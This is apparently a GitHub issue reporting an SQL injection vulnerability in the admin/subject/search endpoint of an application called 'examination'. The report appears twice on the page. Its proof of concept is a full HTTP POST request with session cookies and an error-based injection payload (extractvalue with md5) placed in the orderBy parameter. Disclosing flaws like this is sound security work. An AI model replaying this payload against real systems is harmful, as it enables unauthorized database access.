We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Vulnerability Product:examination Vulnerability type:sql injection Vulnerability Details:admin/subject/search URL admin/subject/search
poc `POST /admin/subject/search HTTP/1.1 Host: 192.168.3.129:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Length: 1131 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: ace_settings=%7B%22sidebar-collapsed%22%3A-1%7D; Hm_lvt_d3b3b1b968a56124689d1366adeacf8f=1678157952; Hm_lpvt_d3b3b1b968a56124689d1366adeacf8f=1678169014; PHPSESSID=s0dfimdr2smjmr3074qpav8po2; _admin=90cb44057f6077d07dc09f747754e4ea1023f1d289f128c441138467bbf77bb3a%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22_admin%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22tGaaJtNH3SXtUEJtA6LIgNb0LQPEjste%22%2C2592000%5D%22%3B%7D; _csrf=d2ae05f533b7d5d759466c965771950e3a44d9703c618e14b02f805ca2430034a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%222YAZrBa_nRKs7CoKBIVaKhRQvAAV1_Up%22%3B%7D Origin: http://192.168.3.129:8092 Referer: http://192.168.3.129:8092/admin/subject/index X-Csrf-Token: wT_eZWinKd3OgGh3VHJaWKrdpJrKcrab-1R6Af7JBH7zZp8_GuVIgqDSIwRjMTUT6JTy-4Ea5MqNFTtXz5ZRDg== X-Requested-With: XMLHttpRequest Accept-Encoding: gzip
bRegex=false&bRegex_0=false&bRegex_1=false&bRegex_10=false&bRegex_2=false&bRegex_3=false&bRegex_4=false&bRegex_5=false&bRegex_6=false&bRegex_7=false&bRegex_8=false&bRegex_9=false&bSearchable_0=true&bSearchable_1=true&bSearchable_10=true&bSearchable_2=true&bSearchable_3=true&bSearchable_4=true&bSearchable_5=true&bSearchable_6=true&bSearchable_7=true&bSearchable_8=true&bSearchable_9=true&bSortable_0=false&bSortable_1=true&bSortable_10=false&bSortable_2=true&bSortable_3=true&bSortable_4=false&bSortable_5=false&bSortable_6=false&bSortable_7=true&bSortable_8=true&bSortable_9=true&iColumns=11&iDisplayLength=10&iDisplayStart=0&iSortCol_0=1&iSortingCols=1&mDataProp_0=&mDataProp_1=id&mDataProp_10=&mDataProp_2=car_id&mDataProp_3=name&mDataProp_4=desc&mDataProp_5=config&mDataProp_6=image&mDataProp_7=sort&mDataProp_8=status&mDataProp_9=created_at¶ms%5BorderBy%5D=extractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281970555199%29%29%29&sColumns=%2C%2C%2C%2C%2C%2C%2C%2C%2C%2C&sEcho=1&sSearch=&sSearch_0=&sSearch_1=&sSearch_10=&sSearch_2=&sSearch_3=&sSearch_4=&sSearch_5=&sSearch_6=&sSearch_7=&sSearch_8=&sSearch_9=&sSortDir_0=desc`
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Vulnerability Product:examination
Vulnerability type:sql injection
Vulnerability Details:admin/subject/search
URL admin/subject/search
poc
`POST /admin/subject/search HTTP/1.1
Host: 192.168.3.129:8092
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 1131
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: ace_settings=%7B%22sidebar-collapsed%22%3A-1%7D; Hm_lvt_d3b3b1b968a56124689d1366adeacf8f=1678157952; Hm_lpvt_d3b3b1b968a56124689d1366adeacf8f=1678169014; PHPSESSID=s0dfimdr2smjmr3074qpav8po2; _admin=90cb44057f6077d07dc09f747754e4ea1023f1d289f128c441138467bbf77bb3a%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22_admin%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22tGaaJtNH3SXtUEJtA6LIgNb0LQPEjste%22%2C2592000%5D%22%3B%7D; _csrf=d2ae05f533b7d5d759466c965771950e3a44d9703c618e14b02f805ca2430034a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%222YAZrBa_nRKs7CoKBIVaKhRQvAAV1_Up%22%3B%7D
Origin: http://192.168.3.129:8092
Referer: http://192.168.3.129:8092/admin/subject/index
X-Csrf-Token: wT_eZWinKd3OgGh3VHJaWKrdpJrKcrab-1R6Af7JBH7zZp8_GuVIgqDSIwRjMTUT6JTy-4Ea5MqNFTtXz5ZRDg==
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
bRegex=false&bRegex_0=false&bRegex_1=false&bRegex_10=false&bRegex_2=false&bRegex_3=false&bRegex_4=false&bRegex_5=false&bRegex_6=false&bRegex_7=false&bRegex_8=false&bRegex_9=false&bSearchable_0=true&bSearchable_1=true&bSearchable_10=true&bSearchable_2=true&bSearchable_3=true&bSearchable_4=true&bSearchable_5=true&bSearchable_6=true&bSearchable_7=true&bSearchable_8=true&bSearchable_9=true&bSortable_0=false&bSortable_1=true&bSortable_10=false&bSortable_2=true&bSortable_3=true&bSortable_4=false&bSortable_5=false&bSortable_6=false&bSortable_7=true&bSortable_8=true&bSortable_9=true&iColumns=11&iDisplayLength=10&iDisplayStart=0&iSortCol_0=1&iSortingCols=1&mDataProp_0=&mDataProp_1=id&mDataProp_10=&mDataProp_2=car_id&mDataProp_3=name&mDataProp_4=desc&mDataProp_5=config&mDataProp_6=image&mDataProp_7=sort&mDataProp_8=status&mDataProp_9=created_at¶ms%5BorderBy%5D=extractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281970555199%29%29%29&sColumns=%2C%2C%2C%2C%2C%2C%2C%2C%2C%2C&sEcho=1&sSearch=&sSearch_0=&sSearch_1=&sSearch_10=&sSearch_2=&sSearch_3=&sSearch_4=&sSearch_5=&sSearch_6=&sSearch_7=&sSearch_8=&sSearch_9=&sSortDir_0=desc`
The text was updated successfully, but these errors were encountered: